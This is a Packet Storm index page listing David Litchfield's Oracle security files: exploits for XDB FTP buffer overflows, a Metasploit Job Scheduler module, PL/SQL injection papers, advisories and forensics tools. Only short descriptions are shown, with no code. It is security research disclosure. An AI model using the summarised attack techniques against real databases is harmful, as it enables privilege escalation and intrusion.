exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New
Showing 1 - 25 of 128 RSS Feed

Files from David Litchfield

Email addressdavid at davidlitchfield.com
First Active1999-08-17
Last Active2017-09-14
Oracle XDB FTP Server Buffer Overflow
Posted Sep 14, 2017
Authored by David Litchfield, D7X

This is the original ngssoftware's (David Litchfield) exploit presented at blackhat 2003 with modified offsets.

tags | exploit, overflow
SHA-256 | 2934de4bc1a2a39fa753b07c7aed7721ca1d6b5bdca6f0a13ab3af13bb340f69
Oracle XDB FTP Service UNLOCK Buffer Overflow
Posted Aug 12, 2017
Authored by David Litchfield

Oracle XDB FTP service UNLOCK buffer overflow exploit.

tags | exploit, overflow
advisories | CVE-2003-0727
SHA-256 | 9e19613c0772392eaf9f901e50037bd1162a139d600f1e7c69b1a0f577c16ba4
Oracle Patches 27 Vulnerabilities
Posted Jul 20, 2016
Authored by David Litchfield

A total of 27 vulnerabilities have been patched by Oracle. These affect eBusiness Suite R12.x and 11.5, Apex, Primavera, OBIEE, and Agile DB components. These issues include SQL injection, cross site scripting, XXE injection, SSRF, failed access controls, and more.

tags | exploit, vulnerability, xss, sql injection, xxe
advisories | CVE-2016-3448, CVE-2016-3467
SHA-256 | 1653be97a06d0c2cfb3b03919f6fc2b0e26ba7129144b78467d3acbf64b1587a
DBMS_XMLSTORE As An Auxiliary SQL Injection Function In Oracle 12c
Posted Jul 22, 2014
Authored by David Litchfield

The ability to execute arbitrary SQL on Oracle via a SQL injection flaw is hampered by the fact that the Oracle RDBMS will not batch multiple queries. Typically, a low privileged attacker with say only the CREATE SESSION privilege, must find a function they can inject that will allow them to execute a block of anonymous PL/SQL. These are known as auxiliary inject functions. Depending upon the version of Oracle and what components are installed auxiliary inject functions may be few and far between. For example, on Oracle 12c with the internal Java VM removed, there may be none. Indeed, during a recent client assessment the author of this paper was confronted with such a situation: a PL/SQL injection flaw but with no easy method for easy exploitation to gain full control of the database server. This paper presents a method around such a problem using DBMS_XMLSTORE and, co-incidentally, DBMS_XMLSAVE. This method can be used in web-based SQL injection attacks, as well.

tags | paper, java, web, arbitrary, sql injection
SHA-256 | 42373a43d60cc25c4d8fb1e06e905e8adafeae668b2a402d7121f1232ab9d611
Oracle Data Redaction Is Broken
Posted Jul 16, 2014
Authored by David Litchfield

Oracle data redaction is a simple but clever and innovative idea from Oracle. However, at present, there are weaknesses that undermine its effectiveness as a good security mechanism. These weaknesses can be exploited via web based SQL injection attacks and this paper details those weaknesses and provides suggestions on how it can be improved and made more secure.

tags | paper, web, sql injection
SHA-256 | 8cb488d94f0f24c541295b45894955646b915f06b2bd3f2038f2c4e7aac4422f
Oracle Job Scheduler Named Pipe Command Execution
Posted Dec 23, 2011
Authored by David Litchfield, sinn3r, juan vazquez | Site metasploit.com

This Metasploit module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job Scheduler is implemented via the component extjob.exe which listens on a named pipe called "orcljsex<SID>" and execute arbitrary commands received throw this channel via CreateProcess(). In order to connect to the Named Pipe remotely SMB access is required. This Metasploit module has been tested on Oracle 10g Release 1 where the Oracle Job Scheduler runs as SYSTEM on Windows but it's disabled by default.

tags | exploit, arbitrary
systems | windows
SHA-256 | a5520991853dfba840715d948313a5ca0eee49a3177ec837c2761cf043b2c418
Exploiting PL/SQL Injection With Only Create Session Privileges In Oracle 11g
Posted Feb 12, 2010
Authored by David Litchfield

Whitepaper called Exploiting PL/SQL Injection With Only CREATE SESSION Privileges In Oracle 11g.

tags | paper, sql injection
SHA-256 | 31157f3cb6f553cf34b6e768826f981a7cca2b5b1cc22b2d008070e67dfeea5a
Hacking Aurora In Oracle 11g
Posted Feb 12, 2010
Authored by David Litchfield

Whitepaper called Hacking Aurora In Oracle 11g.

tags | paper
SHA-256 | 0feb80641a5561dcb72d5ac33a246623657479f00c1457155b7e072996ee1aa7
Oracle 9i XDB FTP UNLOCK Overflow (win32)
Posted Nov 26, 2009
Authored by David Litchfield, MC | Site metasploit.com

By passing an overly long token to the UNLOCK command, a stack based buffer overflow occurs.

tags | exploit, overflow
advisories | CVE-2003-0727
SHA-256 | 9d803a65a0fa667c55d0a6301fe1f03824fd821936248035c9472f401cc84910
Oracle 11g Password History
Posted Aug 26, 2009
Authored by David Litchfield | Site ngssoftware.com

Oracle 11g has an issue where password history is broken if it is set to use 11g passwords exclusively.

tags | advisory
advisories | CVE-2009-0988
SHA-256 | 0510af9aad44c7b6b78b30c03316a2131fe500ceabd5a53f4596b48268c0147d
Bypassing Oracle DBMS_ASSERT
Posted Aug 25, 2009
Authored by David Litchfield | Site ngssoftware.com

Whitepaper called Bypassing Oracle DBMS_ASSERT (in certain situations). Originally written in July of 2008 but is just being released now.

tags | paper
SHA-256 | e6e1d68c71f6151caeb0c9cf0b475ad6bbf96d0a3d4464eca34740718a6b39f8
Oracle PL/SQL Injection
Posted Aug 25, 2009
Authored by David Litchfield | Site ngssoftware.com

Oracle suffers from a PL/SQL injection vulnerability in REPCAT_RPC.VALIDATE_REMOTE_RC.

tags | advisory, sql injection
advisories | CVE-2009-1021
SHA-256 | 5d4b4629c0dfdd25f1e4105dfc3bdb283c7a29ba838e5cb3f49d18e230721815
NGSSoftware Insight Security Research Advisory NISR13012009
Posted Jan 14, 2009
Authored by David Litchfield | Site ngssoftware.com

NGSSoftware Insight Security Research Advisory - Oracle has just released a fix for a flaw that, when exploited, allows a low privileged authenticated database user to gain MDSYS privileges. This can be abused by an attacker to perform actions as the MDSYS user. MDSYS.SDO_TOPO_DROP_FTBL is one of the triggers that forms part of the Oracle Spatial Application. It is vulnerable to SQL injection. When a user drops a table the trigger fires. The name of the table is embedded in a dynamic SQL query which is then executed by the trigger. Note that the Oracle advisory states that the attacker requires the DROP TABLE and CREATE PROCEDURE privileges. This is not the case and only CREATE SESSION privileges are required.

tags | advisory, sql injection
advisories | CVE-2008-3979
SHA-256 | 5121c42e5d2e8b18156a9dd21c0939cd3a695ecc1539eda09d741e19ef556402
cadfile.zip
Posted Nov 26, 2008
Authored by David Litchfield | Site databasesecurity.com

Orablock allows a forensic investigator the ability to dump data from a "cold" Oracle data file.There is no need to load up the data file in the database which would cause the data file to be modified, so using orablock preserves the evidence.Orablock can also be used to locate "stale" data - data that has been deleted or updated.

tags | tool, forensics
SHA-256 | c27a3adbdc20b162d44045a32dee98aa4c8cc3e34d7b97443c808d75c9a898ef
oracle-forensics-scns.pdf
Posted Nov 26, 2008
Authored by David Litchfield | Site databasesecurity.com

Oracle Forensics Part 7: Using the Oracle System Change Number in Forensic Examinations.

tags | paper
SHA-256 | 051ce7024ae89d5e1b9b1e94a3bf3171e5efbdd0947cbd1832b4846b9d8611cf
lateral-sql-followup.txt
Posted Jul 18, 2008
Authored by David Litchfield | Site ngssoftware.com

Follow up information regarding a whitepaper about lateral SQL injection and how ALTER SESSION privileges are not needed.

tags | advisory, sql injection
SHA-256 | 06ae8157765032c011e169cd19e3c3a5aabdb8d056cd7f0dc04fe33ce633c4c1
NISR15072008.txt
Posted Jul 16, 2008
Authored by David Litchfield | Site ngssoftware.com

NGSSoftware Insight Security Research Advisory - Oracle Application Server installs a number of PLSQL packages in the backend database server. One of these is the WWV_RENDER_REPORT package and it is vulnerable to PLSQL injection. This package uses definer rights execution and therefore executes with the privileges of the owner, in this case the highly privileged PORTAL user.

tags | advisory, sql injection
advisories | CVE-2008-2589
SHA-256 | 9b8fadd595dfccce56403731ee006274cd61e8b1f62476460b18211d7135e98e
lateral-sql-injection.pdf
Posted Apr 24, 2008
Authored by David Litchfield | Site ngssoftware.com

Lateral SQL Injection: A New Class of Vulnerability in Oracle.

tags | paper, sql injection
SHA-256 | 0db673b33010a9aa5626bc5198e1ef07be87e36a1d9a04d25e9c098c2c211bbe
oracle-default.txt
Posted Nov 14, 2007
Authored by David Litchfield | Site ngssoftware.com

Oracle 11g and 10g have a default password vulnerability during the install process.

tags | advisory
SHA-256 | 9f5760b9411b159e7a5575efdffb65924eed9b9c2af42fc47a84c44578aa8694
NISR17102007E.txt
Posted Oct 18, 2007
Authored by David Litchfield | Site ngssoftware.com

NGSSoftware Insight Security Research Advisory - The Oracle XML DB ftp service contains problems with auditing logins.

tags | advisory
SHA-256 | 2639ac2b24b2c8d5133eff124f15167a71fbd4375eea39277529464a214d3dce
NISR17102007D.txt
Posted Oct 18, 2007
Authored by David Litchfield | Site ngssoftware.com

NGSSoftware Insight Security Research Advisory - The Oracle RDBMS on receiving an invalid TNS data packet will use 100% of the CPU's time introducing a denial of service condition.

tags | advisory, denial of service
SHA-256 | e7b0e95883d2072b1a56b5fdfcf4738223ad9c7c04551753f7ce3368ba5e986c
NISR17102007C.txt
Posted Oct 18, 2007
Authored by David Litchfield | Site ngssoftware.com

NGSSoftware Insight Security Research Advisory - The Oracle TNS Listener suffers from denial of service and/or remote memory inspection vulnerabilities. Systems affected include Oracle 8.1.7.4, 10g Release 2 and 1, Oracle 9.

tags | advisory, remote, denial of service, vulnerability
SHA-256 | 2df77d5f0342cb6ee96c1251a4daebb88b481263665cf072ef864d3780bd5b37
NISR17102007B.txt
Posted Oct 18, 2007
Authored by David Litchfield | Site ngssoftware.com

NGSSoftware Insight Security Research Advisory - The Workspace Manager in Oracle 10g release 1 and 2 and Oracle 9i is vulnerable to SQL injection. The Workspace Manager, owned by SYS, contains a package called LT. This package is owned and defined by the SYS user and can be executed by PUBLIC. LT contains a procedure called FINDRICSET which calls the FINDRICSET package in the LTRIC package. This is vulnerable to SQL injection and can be abused by an attacker to gain SYS privileges.

tags | advisory, sql injection
SHA-256 | 5df31c6c9790c218a2a5535198524baba532d40fd776334551174739a7f50ba0
NISR17102007A.txt
Posted Oct 18, 2007
Authored by David Litchfield | Site ngssoftware.com

NGSSoftware Insight Security Research Advisory - The Intermedia application, owned by CTXSYS, contains a package called CTX_DOC. This package contains multiple SQL injection flaws.

tags | advisory, sql injection
SHA-256 | b9ba2ce84bdcab48f900e299204898570d236d962e46142d20245fc29727b497
oracle-forensics-6.pdf
Posted Aug 17, 2007
Authored by David Litchfield | Site databasesecurity.com

Whitepaper: Oracle Forensics Part 6 - Examining Undo Segments, Flashback and the Oracle Recycle Bin.

tags | paper
SHA-256 | 76e1d7ed99164fa689c01f4960b40e5de09c7ff60fa91c3fe4fcaabf1c4422f2
Page 1 of 6
Back12345Next

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close